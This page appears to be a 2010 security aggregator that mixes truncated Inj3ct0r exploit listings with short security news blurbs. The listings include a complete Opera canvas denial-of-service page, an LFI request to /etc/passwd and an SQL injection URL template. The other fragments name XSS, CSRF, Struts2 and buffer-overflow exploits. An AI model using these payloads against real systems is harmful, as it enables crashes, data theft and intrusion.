Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Health &amp; Fitness Stats Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Joomla Health &amp; Fitness Stats Persistent XSS Vulnerability
==========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Opera Denial of Service by &lt;canvas&gt; Element</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
Opera Denial of Service by &lt;canvas&gt; Element
===========================================
Opera.html
&lt;html&gt;
&lt;body onload=&quot;Opera()&quot;&gt;
&lt;script language=JavaScript&gt;
function Opera() {
canvas = document.getElementById(&quot;canvas&quot;);
ctx = canvas.getContext(&quot;2d&quot;);
ctx.getImageData(0,0,0×20000,0×20000);
}
&lt;/script&gt;
&lt;canvas id=canvas width=10 height=10&gt;&lt;/canvas&gt;
&lt;/body&gt;
&lt;/html&gt;
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-12]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Struts2/XWork &lt; 2.2.0 Remote Command Execution Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
Struts2/XWork &lt; 2.2.0 Remote Command Execution Vulnerability
============================================================
Apache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Absolute Shopping cart (company.asp) sql Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
Absolute Shopping cart (company.asp) sql Injection Vulnerability
================================================================
# Exploit Title: Absolute Shopping cart(company.asp) sql Injection Vulnerability
# Author: Pokeng
# Software Link: http://www.absoluteshoppingcart.co.uk/Category-192/shopping-cart-software
# Platform / Tested on: Win/Linux
# category: webapps/0day
# Code : http://[site]/company.asp?ID=[SQLI]
# Dork [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Whizzy CMS v10.01 Local File Inclusion Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Whizzy CMS v10.01 Local File Inclusion Vulnerability
====================================================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Local File Inclusion
[x] Vendor: Unverse.net
[x] Script Name: Whizzy CMS
[x] Script version: 10.01
[x] Author: Anarchy Angel
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://site.org/?[LFI]
Ex:
http://site.org/?../../../../../../../etc/passwd
Special Tnx : lun0s, proge, sToRm, [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Campsite CMS remote Persistent XSS vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Campsite CMS remote Persistent XSS vulnerability
================================================
#################################################################
# Exploit Title: Campsite CMS remote Persistent XSS vulnerability
# Date: 15th july 2010
# Author: D4rk357
#Critical:Low
#contact:d4rk357[at]yahoo[dot]in
# Software Link:http://www.sourcefabric.org/en/home/web/78/Demo–Documentation.htm?tpl=18
Greetz to :b0nd, Fbih2s,Beenu,rockey killer,The empty(), punter,eberly,prashant
Shoutz to : http://www.garage4hackers.com/forum.php , [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities
==========================================================
The vulnerable application can be downloaded from: http://www.xmbforum.com/download/XMB-1.9.11.09.zip
&lt;!—
Title: eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities
Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt;
[...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================================
RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability
===================================================================
RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability
Name RedShop
[...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Power/Personat FTP 2.30 Server RETR Command DoS</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
Power/Personat FTP 2.30 Server RETR Command DoS
===============================================
#!/usr/bin/python
#——————————————–
# Power/Personal FTP Server RETR Command DoS
#——————————————–
# Title: Power/Personat FTP Server RETR Command DoS
# Author: antrhacks
# Specifically for Inj3ct0r.com (Exploit DataBase)
# Software Link: http://www.cooolsoft.com/download/PowerFTP.EXE
# [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Novell Groupwise Webaccess Stack Overflow</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
Novell Groupwise Webaccess Stack Overflow
=========================================
#####################################################################################
Application: Novell Groupwise Webaccess Stack Overflow
Platforms: Windows, Linux &amp; Netware (GroupWise 7.0, 7.01, 7.02, 7.03x, 7.04, 8.0, 8.01x)
Exploitation: Remote code execution
CVE Number:
Novell [...]

Nintendo’s forthcoming 3DS console is to feature new technology designed to prevent software piracy, according to a leading publisher.
Ian Curran, executive vice-president of global publishing for THQ, told CVG that he has received assurance from Nintendo that the unit will include "sophisticated" anti-piracy measures which go beyond those seen on the DSi.
The platform holder will [...]

A report into the state of internet security has found patching is still woefully poor among computer users.
Of the top ten exploited vulnerabilities in M86 Security’s analysis of the first half of 2010 only one had been patched this year, while one fix was issued in 2006 and the majority were at least two years [...]

The infamous iOS 4.1 update is now available through Appleâ??s Developer Center. iOS 4.1 Beta is available for download now for all of those who have access to the dev center. This is the news that many frustrated iPhone 4 owners have been anticipating for some time, but a new question now rises: what exactly [...]

I got into hardware hacking as a kid, but never quite stuck with. Electronics weren’t safe back then, and I often bridged that world with the physical to give my G.I. Joe something new conquer. That interest has been renewed.
After the Capture the Flag competition ended a couple of years ago at DEFCON, I wandered [...]

Mozilla has disabled and block-listed a Firefox add-on containing code that nabs login data sent to any website and reroutes it to a remote server.
The add-on â?? known as, um, Mozilla Sniffer â?? was uploaded to the Firefox add-on site on June 6, and the malicious code was discovered on Monday, after which the add-on [...]

He has been warned never to travel to America. It is said that he never spends more than two nights in one place. And why? Because he runs a little website called WikiLeaks . . . Stephen Moss tracks down the elusive Julian Assange.
Everything about this is odd. Julian Assange, the founder, director, frontman, guiding [...]

A report from a Danish software security firm says Apple computers now run the most vulnerable software, and Mozilla Firefox has more vulnerabilities than other popular browsers.
Secunia, which offers security consulting and software to business, outlined the number of common vulnerabilities and exposures, or CVEs, in its half year report for 2010. The company ranked [...]

On May 6, the Dow Jones Industrial average was puttering along, trading in a range between 10,600 and 10,800 for most of the day. Then, suddenly around 2:30 pm, the index suddenly dropped 1,000 points in just a few minutes. Panic dulled, and the index perked right back up. But for a few minutes there, [...]

Last night, I endured plodding, water-logged, rush-hour traffic to Tysons Corner to hear a guy talk about the Internet.
But this wasn’t just any guy, it was one of the people who helped invent the Internet — Vint Cerf. Decades before starting his current day job as a "vice president and chief Internet evangelist" for Google, [...]

According to security researcher Craig Heffner, about half the existing models of home routers, including most Linksys, Dell, and Verizon, are vulnerable to being hacked.
The hack relies on tricking people to visit a malicious website. From that point on, the router itself can be hijacked and the poor user redirected pretty much anywhere the hacker [...]